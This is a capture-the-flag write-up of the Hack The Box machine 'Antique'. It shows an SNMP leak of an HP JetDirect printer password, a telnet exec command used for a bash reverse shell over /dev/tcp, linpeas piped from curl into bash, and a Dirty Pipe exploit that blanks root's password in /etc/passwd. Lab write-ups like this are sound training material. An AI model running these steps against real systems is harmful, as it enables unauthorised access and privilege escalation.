Antique Writeup

10 September 2022 #CTF #HTB #box #easy #linux

Antique info


By an nmap scan shall we start this box:

$ sudo nmap -sC -sV -oN enum/initial.nmap
23/tcp open  telnet?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns, tn3270: 
|     JetDirect
|     Password:
|   NULL: 
|_    JetDirect

HP JetDirect

The nmap scan shows only 1 tcp port open and it's not really sure what it is. Fine, we'll check ourselves:

$ nc 23

HP JetDirect

Password: admin
Invalid password

HP JetDirect is a simple network printing protocol. Let's see if it has some known vulnerabilities:

$ searchsploit hp jetdirect
HP JetDirect Printer - SNMP JetAdmin Device Password Disclosure

Sounds good.


SNMP is the Simple Network Management Protocol. It allows to query information about all kinds of settings like cpu temperature, disk usage, etc (a lot of things).

To make sure that SNMP is running we could perform an UDP nmap scan but it takes so long that we're going blind.

Turns out the password for HP JetDirect can be queried with basically no authentication:

$ snmpget -v 1 -c public .
iso. = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32
33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135

It is hexadecimal so we should decode it:

echo -n '50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32' | xxd -r -p

I took the first line of output (not sure why there are 2) and it definitly looks good but if we try this password:

$ nc 23

HP JetDirect

Password: P@ssw0rd@123!!12
Invalid password

But after adding a '3' at the end it works.


Now that we have access to HP JetDirect, let's see what we can do:

$ nc 23

HP JetDirect

Password: P@ssw0rd@123!!123

Please type "?" for HELP
> ?

To Change/Configure Parameters Enter:
Parameter-name: value <Carriage Return>

Parameter-name Type of value
ip: IP-address in dotted notation
subnet-mask: address in dotted notation (enter 0 for default)
default-gw: address in dotted notation (enter 0 for default)
syslog-svr: address in dotted notation (enter 0 for default)
idle-timeout: seconds in integers
set-cmnty-name: alpha-numeric string (32 chars max)
host-name: alpha-numeric string (upper case only, 32 chars max)
dhcp-config: 0 to disable, 1 to enable
allow: <ip> [mask] (0 to clear, list to display, 10 max)

addrawport: <TCP port num> (<TCP port num> 3000-9000)
deleterawport: <TCP port num>
listrawport: (No parameter required)

exec: execute system commands (exec id)
exit: quit from telnet session

How nice, there is a convenient exec command!

> exec id
uid=7(lp) gid=7(lp) groups=7(lp),19(lpadmin)

Let's just get our reverse shell:

> exec bash -c 'bash -i >& /dev/tcp/ 0>&1'

Don't forget to setup you listener...


After looking around without any success, I decided to run linpeas, a script that looks for privilege escalation vectors.

HTB boxes do not have internet access so first download the script to your own box then transfer it to the target box.

On your local box:

$ mkdir www
$ cd www
$ wget
$ python -m http.server
Serving HTTP on port 8000 ( ...

On the target box:

lp@antique:~$ curl -s | bash
Vulnerable to CVE-2021-4034

Vulnerable to CVE-2021-3560

Vulnerable to CVE-2022-0847

Damn, not 1, not 2, but 3 CVEs are exploitable on this box! Though, the third one didn't exist yet when this box was released. But I'm going to try this one, you know, for fun (:

Dirty Pipe exploit

We'll use this repo. Just get the exp.c file and transfer it to the remote box.

Now compile:

lp@antique:~$ gcc exp.c -o pwn

This vulnerability in the Linux kernel allows anyone to write to files that they do not have permission to. We can for example overwrite the /etc/passwd file to delete the password of the root user.

lp@antique:~$ head -n 1 /etc/passwd
lp@antique:~$ ./pwn /etc/passwd 1 ootz:

This is the example provided in the repo.

Let's think about what it does: we wrote 'ootz:' to the /etc/passwd file with an offset of 1 (1 byte after the beginning of the file).

The : at the end of 'ootz:' will overwrite the 'x' which is the "password":

lp@antique:~$ head -n 1 /etc/passwd

Now the root user does not have a password, meaning we can just login as root:

lp@antique:~$ su rootz
rootz@antique:/home/lp# id
uid=0(rootz) gid=0(root) groups=0(root)
rootz@antique:/home/lp# ls /root  root.txt  snap

And that's the box.

Key Takeaways